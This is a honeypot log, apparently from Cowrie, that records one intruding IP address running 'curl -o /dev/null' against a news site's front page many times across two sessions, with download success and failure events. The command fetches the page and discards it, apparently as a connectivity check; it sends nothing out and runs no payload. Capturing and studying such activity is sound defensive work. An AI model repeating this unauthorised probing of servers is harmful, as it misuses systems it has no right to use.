{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.602876Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.621046Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.625126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.626400Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.660456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.661897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.668646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.670044Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.676594Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.698386Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.719507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.720784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.722904Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.728760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.730531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.737340Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.762170Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.778633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.802626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.804092Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.810251Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.822765Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.823951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.863136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.864599Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.898891Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.903088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.904167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.906832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.909173Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.951641Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.953600Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.954760Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.957383Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.000343Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.004482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.005926Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.047855Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.066825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.068213Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.101695Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.103186Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.162514Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.165983Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.166857Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.264195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.265693Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.317819Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.336602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.337804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.349577Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.351138Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.389103Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.390808Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.394309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.395745Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.431841Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.433336Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.478647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.480077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.481755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.488912Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.490232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.529825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.531206Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.538274Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.539327Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.550486Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.567879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.569035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.577347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.578295Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.624095Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.625474Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.675520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.677003Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.715430Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.716904Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.762635Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.764014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.771802Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.778954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.780988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.782054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.785728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.787522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.794549Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.806176Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.807652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.819620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.820736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.825134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.826002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.851600Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.852938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.856062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.857080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.862350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.863267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.875710Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.891797Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.892847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.894289Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.896234Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.901365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.902887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.929805Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.951908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.977754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.979078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.980989Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
